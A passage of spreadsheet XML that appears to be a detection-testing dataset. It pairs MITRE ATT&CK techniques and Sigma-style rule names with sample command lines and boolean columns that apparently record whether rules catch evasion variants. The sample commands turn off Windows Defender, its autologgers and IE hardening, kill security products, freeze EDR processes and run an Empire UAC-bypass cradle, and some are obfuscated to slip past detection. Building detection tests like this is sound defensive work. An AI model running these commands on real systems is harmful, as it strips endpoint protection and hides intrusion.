      </c>
      <c r="F3497" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3497" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3497" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3497" s="44" t="n"/>
      <c r="J3497" s="44" t="n"/>
      <c r="K3497" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3498" ht="15.75" customHeight="1" s="42">
      <c r="A3498" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3498" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_default_action_modified</t>
        </is>
      </c>
      <c r="C3498" s="44" t="inlineStr">
        <is>
          <t>PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction</t>
        </is>
      </c>
      <c r="D3498" s="44" t="inlineStr">
        <is>
          <t>1e8a9b4d-3c2a-4f9b-8d1e-7c6a5b4f3d2e</t>
        </is>
      </c>
      <c r="E3498" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-MpPreference -LowThreatDefaultAction ( [int][char]'_x0006_' )"</t>
        </is>
      </c>
      <c r="F3498" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3498" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3498" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3498" s="44" t="n"/>
      <c r="J3498" s="44" t="n"/>
      <c r="K3498" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3499" ht="15.75" customHeight="1" s="42">
      <c r="A3499" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3499" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_default_action_modified</t>
        </is>
      </c>
      <c r="C3499" s="44" t="inlineStr">
        <is>
          <t>PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction</t>
        </is>
      </c>
      <c r="D3499" s="44" t="inlineStr">
        <is>
          <t>1e8a9b4d-3c2a-4f9b-8d1e-7c6a5b4f3d2e</t>
        </is>
      </c>
      <c r="E3499" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-M*-Pr*ce -LowThreatDefaultAction 6"</t>
        </is>
      </c>
      <c r="F3499" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3499" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3499" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3499" s="44" t="n"/>
      <c r="J3499" s="44" t="n"/>
      <c r="K3499" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3500" ht="15.75" customHeight="1" s="42">
      <c r="A3500" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3500" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_default_action_modified</t>
        </is>
      </c>
      <c r="C3500" s="44" t="inlineStr">
        <is>
          <t>PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction</t>
        </is>
      </c>
      <c r="D3500" s="44" t="inlineStr">
        <is>
          <t>1e8a9b4d-3c2a-4f9b-8d1e-7c6a5b4f3d2e</t>
        </is>
      </c>
      <c r="E3500" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp;('Set-'+'MpPreference') -LowThreatDefaultAction 6"</t>
        </is>
      </c>
      <c r="F3500" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3500" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3500" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3500" s="44" t="n"/>
      <c r="J3500" s="44" t="n"/>
      <c r="K3500" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3501" ht="15.75" customHeight="1" s="42">
      <c r="A3501" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3501" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_remove_context_menu</t>
        </is>
      </c>
      <c r="C3501" s="44" t="inlineStr">
        <is>
          <t>Windows Defender Context Menu Removed</t>
        </is>
      </c>
      <c r="D3501" s="44" t="inlineStr">
        <is>
          <t>b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b</t>
        </is>
      </c>
      <c r="E3501" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp;('Remove-'+'Item') 'HKLM:\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP'"</t>
        </is>
      </c>
      <c r="F3501" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3501" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3501" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3501" s="44" t="n"/>
      <c r="J3501" s="44" t="n"/>
      <c r="K3501" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3502" ht="15.75" customHeight="1" s="42">
      <c r="A3502" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3502" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_remove_context_menu</t>
        </is>
      </c>
      <c r="C3502" s="44" t="inlineStr">
        <is>
          <t>Windows Defender Context Menu Removed</t>
        </is>
      </c>
      <c r="D3502" s="44" t="inlineStr">
        <is>
          <t>b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b</t>
        </is>
      </c>
      <c r="E3502" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Remove-I* -Path 'HKLM:\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP'"</t>
        </is>
      </c>
      <c r="F3502" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3502" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3502" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3502" s="44" t="n"/>
      <c r="J3502" s="44" t="n"/>
      <c r="K3502" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3503" ht="15.75" customHeight="1" s="42">
      <c r="A3503" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3503" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dism_remove</t>
        </is>
      </c>
      <c r="C3503" s="44" t="inlineStr">
        <is>
          <t>Dism Remove Online Package</t>
        </is>
      </c>
      <c r="D3503" s="44" t="inlineStr">
        <is>
          <t>43e32da2-fdd0-4156-90de-50dfd62636f9</t>
        </is>
      </c>
      <c r="E3503" s="44" t="inlineStr">
        <is>
          <t>dism.exe -Online -Disable-Feature -FeatureName:Windows-Defender /NoRestart /quiet</t>
        </is>
      </c>
      <c r="F3503" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3503" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3503" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3503" s="44" t="n"/>
      <c r="J3503" s="44" t="n"/>
      <c r="K3503" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3504" ht="15.75" customHeight="1" s="42">
      <c r="A3504" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3504" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_ie_features</t>
        </is>
      </c>
      <c r="C3504" s="44" t="inlineStr">
        <is>
          <t>Disabled IE Security Features</t>
        </is>
      </c>
      <c r="D3504" s="44" t="inlineStr">
        <is>
          <t>fb50eb7a-5ab1-43ae-bcc9-091818cb8424</t>
        </is>
      </c>
      <c r="E3504" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "Set-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Internet Explorer\\Main' -name 'IEHarden'  -value 0 -Force"</t>
        </is>
      </c>
      <c r="F3504" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3504" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3504" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3504" s="44" t="n"/>
      <c r="J3504" s="44" t="n"/>
      <c r="K3504" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3505" ht="15.75" customHeight="1" s="42">
      <c r="A3505" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3505" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_ie_features</t>
        </is>
      </c>
      <c r="C3505" s="44" t="inlineStr">
        <is>
          <t>Disabled IE Security Features</t>
        </is>
      </c>
      <c r="D3505" s="44" t="inlineStr">
        <is>
          <t>fb50eb7a-5ab1-43ae-bcc9-091818cb8424</t>
        </is>
      </c>
      <c r="E3505" s="44" t="inlineStr">
        <is>
          <t>reg add 'HKCU\\Software\\Microsoft\\Internet Explorer\\Main' /v DEPOff /t REG_DWORD /d 1 /f</t>
        </is>
      </c>
      <c r="F3505" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3505" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3505" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3505" s="44" t="n"/>
      <c r="J3505" s="44" t="n"/>
      <c r="K3505" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3506" ht="15.75" customHeight="1" s="42">
      <c r="A3506" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3506" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_ie_features</t>
        </is>
      </c>
      <c r="C3506" s="44" t="inlineStr">
        <is>
          <t>Disabled IE Security Features</t>
        </is>
      </c>
      <c r="D3506" s="44" t="inlineStr">
        <is>
          <t>fb50eb7a-5ab1-43ae-bcc9-091818cb8424</t>
        </is>
      </c>
      <c r="E3506" s="44" t="inlineStr">
        <is>
          <t>reg add 'HKCU\\Software\\Microsoft\\Internet Explorer\\Main' /v DisableFirstRunCustomize /t REG_DWORD /d 2 /f</t>
        </is>
      </c>
      <c r="F3506" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3506" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3506" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3506" s="44" t="n"/>
      <c r="J3506" s="44" t="n"/>
      <c r="K3506" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3507" ht="15.75" customHeight="1" s="42">
      <c r="A3507" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3507" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_disable_defender_wmi_autologger</t>
        </is>
      </c>
      <c r="C3507" s="44" t="inlineStr">
        <is>
          <t>Disabling Windows Defender WMI Autologger Session via Reg.exe</t>
        </is>
      </c>
      <c r="D3507" s="44" t="inlineStr">
        <is>
          <t>a1b2c3d4-e5f6-a7b8-c9d0-e1f2a3b4c5d6</t>
        </is>
      </c>
      <c r="E3507" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "\\\Control\\WMI\\Autologger\\DefenderApiLogger\\Start" /v 0 /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F3507" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3507" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3507" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3507" s="44" t="n"/>
      <c r="J3507" s="44" t="n"/>
      <c r="K3507" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3508" ht="15.75" customHeight="1" s="42">
      <c r="A3508" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3508" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_disable_defender_wmi_autologger</t>
        </is>
      </c>
      <c r="C3508" s="44" t="inlineStr">
        <is>
          <t>Disabling Windows Defender WMI Autologger Session via Reg.exe</t>
        </is>
      </c>
      <c r="D3508" s="44" t="inlineStr">
        <is>
          <t>a1b2c3d4-e5f6-a7b8-c9d0-e1f2a3b4c5d6</t>
        </is>
      </c>
      <c r="E3508" s="44" t="inlineStr">
        <is>
          <t>reg add /v "Control\WMI\Autologger\DefenderAuditLogger\Start" /t REG_DWORD /d 0</t>
        </is>
      </c>
      <c r="F3508" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3508" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3508" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3508" s="44" t="n"/>
      <c r="J3508" s="44" t="n"/>
      <c r="K3508" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3509" ht="15.75" customHeight="1" s="42">
      <c r="A3509" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3509" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_disable_defender_wmi_autologger</t>
        </is>
      </c>
      <c r="C3509" s="44" t="inlineStr">
        <is>
          <t>Disabling Windows Defender WMI Autologger Session via Reg.exe</t>
        </is>
      </c>
      <c r="D3509" s="44" t="inlineStr">
        <is>
          <t>a1b2c3d4-e5f6-a7b8-c9d0-e1f2a3b4c5d6</t>
        </is>
      </c>
      <c r="E3509" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "\\\Control\\WMI\\Autologger\\DefenderApiLogger\\Start" 0</t>
        </is>
      </c>
      <c r="F3509" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3509" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3509" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3509" s="44" t="n"/>
      <c r="J3509" s="44" t="n"/>
      <c r="K3509" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3510" ht="15.75" customHeight="1" s="42">
      <c r="A3510" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3510" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_disable_defender_wmi_autologger</t>
        </is>
      </c>
      <c r="C3510" s="44" t="inlineStr">
        <is>
          <t>Disabling Windows Defender WMI Autologger Session via Reg.exe</t>
        </is>
      </c>
      <c r="D3510" s="44" t="inlineStr">
        <is>
          <t>a1b2c3d4-e5f6-a7b8-c9d0-e1f2a3b4c5d6</t>
        </is>
      </c>
      <c r="E3510" s="44" t="inlineStr">
        <is>
          <t>reg.exe add /d 0 /t REG_DWORD /v "Control\WMI\Autologger\DefenderAuditLogger\Start"</t>
        </is>
      </c>
      <c r="F3510" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3510" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3510" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3510" s="44" t="n"/>
      <c r="J3510" s="44" t="n"/>
      <c r="K3510" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3511" ht="15.75" customHeight="1" s="42">
      <c r="A3511" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3511" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_disable_defender_wmi_autologger</t>
        </is>
      </c>
      <c r="C3511" s="44" t="inlineStr">
        <is>
          <t>Disabling Windows Defender WMI Autologger Session via Reg.exe</t>
        </is>
      </c>
      <c r="D3511" s="44" t="inlineStr">
        <is>
          <t>a1b2c3d4-e5f6-a7b8-c9d0-e1f2a3b4c5d6</t>
        </is>
      </c>
      <c r="E3511" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "Control\WMI\Autologger\DefenderApiLogger\Start" 0x0</t>
        </is>
      </c>
      <c r="F3511" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3511" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3511" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3511" s="44" t="n"/>
      <c r="J3511" s="44" t="n"/>
      <c r="K3511" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3512" ht="15.75" customHeight="1" s="42">
      <c r="A3512" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3512" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_disable_raccine</t>
        </is>
      </c>
      <c r="C3512" s="44" t="inlineStr">
        <is>
          <t>Raccine Uninstall</t>
        </is>
      </c>
      <c r="D3512" s="44" t="inlineStr">
        <is>
          <t>a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc</t>
        </is>
      </c>
      <c r="E3512" s="44" t="inlineStr">
        <is>
          <t>taskkill /f /im "RaccineSettings".exe</t>
        </is>
      </c>
      <c r="F3512" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3512" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3512" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3512" s="44" t="n"/>
      <c r="J3512" s="44" t="n"/>
      <c r="K3512" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3513" ht="15.75" customHeight="1" s="42">
      <c r="A3513" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3513" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_taskkill_sep</t>
        </is>
      </c>
      <c r="C3513" s="44" t="inlineStr">
        <is>
          <t>Taskkill Symantec Endpoint Protection</t>
        </is>
      </c>
      <c r="D3513" s="44" t="inlineStr">
        <is>
          <t>4a6713f6-3331-11ed-a261-0242ac120002</t>
        </is>
      </c>
      <c r="E3513" s="44" t="inlineStr">
        <is>
          <t>taskkill /F /IM ccSvcHst</t>
        </is>
      </c>
      <c r="F3513" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3513" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3513" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3513" s="44" t="n"/>
      <c r="J3513" s="44" t="n"/>
      <c r="K3513" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3514" ht="15.75" customHeight="1" s="42">
      <c r="A3514" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3514" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_werfaultsecure_process_freeze</t>
        </is>
      </c>
      <c r="C3514" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Suspension via WERFaultSecure through EDR-Freeze</t>
        </is>
      </c>
      <c r="D3514" s="44" t="inlineStr">
        <is>
          <t>1f0b4cac-9c81-41f4-95d0-8475ff46b3e2</t>
        </is>
      </c>
      <c r="E3514" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WerFaultSecure.exe -h -pid 1234 -tid 5678 -encfile C:\path\to\file -cancel -type 268310</t>
        </is>
      </c>
      <c r="F3514" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3514" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3514" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3514" s="44" t="n"/>
      <c r="J3514" s="44" t="n"/>
      <c r="K3514" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3515" ht="15.75" customHeight="1" s="42">
      <c r="A3515" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3515" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_werfaultsecure_process_freeze</t>
        </is>
      </c>
      <c r="C3515" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Suspension via WERFaultSecure through EDR-Freeze</t>
        </is>
      </c>
      <c r="D3515" s="44" t="inlineStr">
        <is>
          <t>1f0b4cac-9c81-41f4-95d0-8475ff46b3e2</t>
        </is>
      </c>
      <c r="E3515" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WerFaultSecure.exe /type 268310 /cancel /encfile C:\path\to\file /tid 5678 /pid 1234 /h</t>
        </is>
      </c>
      <c r="F3515" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3515" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3515" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3515" s="44" t="n"/>
      <c r="J3515" s="44" t="n"/>
      <c r="K3515" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3516" ht="15.75" customHeight="1" s="42">
      <c r="A3516" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3516" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_werfaultsecure_process_freeze</t>
        </is>
      </c>
      <c r="C3516" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Suspension via WERFaultSecure through EDR-Freeze</t>
        </is>
      </c>
      <c r="D3516" s="44" t="inlineStr">
        <is>
          <t>1f0b4cac-9c81-41f4-95d0-8475ff46b3e2</t>
        </is>
      </c>
      <c r="E3516" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WerFaultSecure.exe "/h" "/pid" 1234 "/tid" 5678 "/encfile" C:\path\to\file "/cancel" "/type" 268310</t>
        </is>
      </c>
      <c r="F3516" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3516" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3516" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3516" s="44" t="n"/>
      <c r="J3516" s="44" t="n"/>
      <c r="K3516" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3517" ht="15.75" customHeight="1" s="42">
      <c r="A3517" s="44" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B3517" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_deviceenroller_dll_sideloading</t>
        </is>
      </c>
      <c r="C3517" s="44" t="inlineStr">
        <is>
          <t>Potential DLL Sideloading Via DeviceEnroller.EXE</t>
        </is>
      </c>
      <c r="D3517" s="44" t="inlineStr">
        <is>
          <t>e173ad47-4388-4012-ae62-bd13f71c18a8</t>
        </is>
      </c>
      <c r="E3517" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\DeviceEnroller.exe -PhoneDeepLink AnyStringDataHere</t>
        </is>
      </c>
      <c r="F3517" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3517" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3517" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3517" s="44" t="n"/>
      <c r="J3517" s="44" t="n"/>
      <c r="K3517" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3518" ht="15.75" customHeight="1" s="42">
      <c r="A3518" s="44" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B3518" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_task_folder_evasion</t>
        </is>
      </c>
      <c r="C3518" s="44" t="inlineStr">
        <is>
          <t>Tasks Folder Evasion</t>
        </is>
      </c>
      <c r="D3518" s="44" t="inlineStr">
        <is>
          <t>cc4e02ba-9c06-48e2-b09e-2500cace9ae0</t>
        </is>
      </c>
      <c r="E3518" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c e^cho. &gt; C:\Windows\System32\Tasks\test.txt</t>
        </is>
      </c>
      <c r="F3518" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3518" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3518" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3518" s="44" t="n"/>
      <c r="J3518" s="44" t="n"/>
      <c r="K3518" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3519" ht="15.75" customHeight="1" s="42">
      <c r="A3519" s="44" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B3519" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dllhost_no_cli_execution</t>
        </is>
      </c>
      <c r="C3519" s="44" t="inlineStr">
        <is>
          <t>Dllhost.EXE Execution Anomaly</t>
        </is>
      </c>
      <c r="D3519" s="44" t="inlineStr">
        <is>
          <t>e7888eb1-13b0-4616-bd99-4bc0c2b054b9</t>
        </is>
      </c>
      <c r="E3519" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\dllhost.exe</t>
        </is>
      </c>
      <c r="F3519" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3519" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3519" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3519" s="44" t="n"/>
      <c r="J3519" s="44" t="n"/>
      <c r="K3519" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3520" ht="15.75" customHeight="1" s="42">
      <c r="A3520" s="44" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B3520" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dllhost_no_cli_execution</t>
        </is>
      </c>
      <c r="C3520" s="44" t="inlineStr">
        <is>
          <t>Dllhost.EXE Execution Anomaly</t>
        </is>
      </c>
      <c r="D3520" s="44" t="inlineStr">
        <is>
          <t>e7888eb1-13b0-4616-bd99-4bc0c2b054b9</t>
        </is>
      </c>
      <c r="E3520" s="44" t="inlineStr">
        <is>
          <t>dllhost.exe /?</t>
        </is>
      </c>
      <c r="F3520" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3520" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3520" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3520" s="44" t="n"/>
      <c r="J3520" s="44" t="n"/>
      <c r="K3520" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3521" ht="15.75" customHeight="1" s="42">
      <c r="A3521" s="44" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B3521" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_dinjector</t>
        </is>
      </c>
      <c r="C3521" s="44" t="inlineStr">
        <is>
          <t>HackTool - DInjector PowerShell Cradle Execution</t>
        </is>
      </c>
      <c r="D3521" s="44" t="inlineStr">
        <is>
          <t>d78b5d61-187d-44b6-bf02-93486a80de5a</t>
        </is>
      </c>
      <c r="E3521" s="44" t="inlineStr">
        <is>
          <t>powershell.exe .\DInjector.ps1 "/am51" "/password" 'Secret123'</t>
        </is>
      </c>
      <c r="F3521" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3521" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3521" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3521" s="44" t="n"/>
      <c r="J3521" s="44" t="n"/>
      <c r="K3521" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3522" ht="15.75" customHeight="1" s="42">
      <c r="A3522" s="44" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B3522" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_dinjector</t>
        </is>
      </c>
      <c r="C3522" s="44" t="inlineStr">
        <is>
          <t>HackTool - DInjector PowerShell Cradle Execution</t>
        </is>
      </c>
      <c r="D3522" s="44" t="inlineStr">
        <is>
          <t>d78b5d61-187d-44b6-bf02-93486a80de5a</t>
        </is>
      </c>
      <c r="E3522" s="44" t="inlineStr">
        <is>
          <t>powershell.exe .\DInjector.ps1 /am51	/password	'Secret123'</t>
        </is>
      </c>
      <c r="F3522" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3522" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3522" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3522" s="44" t="n"/>
      <c r="J3522" s="44" t="n"/>
      <c r="K3522" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3523" ht="15.75" customHeight="1" s="42">
      <c r="A3523" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3523" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_explorer_nouaccheck</t>
        </is>
      </c>
      <c r="C3523" s="44" t="inlineStr">
        <is>
          <t>Explorer NOUACCHECK Flag</t>
        </is>
      </c>
      <c r="D3523" s="44" t="inlineStr">
        <is>
          <t>534f2ef7-e8a2-4433-816d-c91bccde289b</t>
        </is>
      </c>
      <c r="E3523" s="44" t="inlineStr">
        <is>
          <t>explorer.exe -NOUACCHECK</t>
        </is>
      </c>
      <c r="F3523" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3523" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3523" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3523" s="44" t="n"/>
      <c r="J3523" s="44" t="n"/>
      <c r="K3523" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3524" ht="15.75" customHeight="1" s="42">
      <c r="A3524" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3524" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_empire_powershell_uac_bypass</t>
        </is>
      </c>
      <c r="C3524" s="44" t="inlineStr">
        <is>
          <t>HackTool - Empire PowerShell UAC Bypass</t>
        </is>
      </c>
      <c r="D3524" s="44" t="inlineStr">
        <is>
          <t>3268b746-88d8-4cd3-bffc-30077d02c787</t>
        </is>
      </c>
      <c r="E3524" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -Command "$x=$((Get-ItemProperty HKCU:Software\Microsoft\WindowsUpdate).Update); Invoke-Expression $x"</t>
        </is>
      </c>
      <c r="F3524" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3524" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3524" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3524" s="44" t="n"/>
      <c r="J3524" s="44" t="n"/>
      <c r="K3524" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3525" ht="15.75" customHeight="1" s="42">
      <c r="A3525" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3525" s="44" t="inlineStr">
        <is>
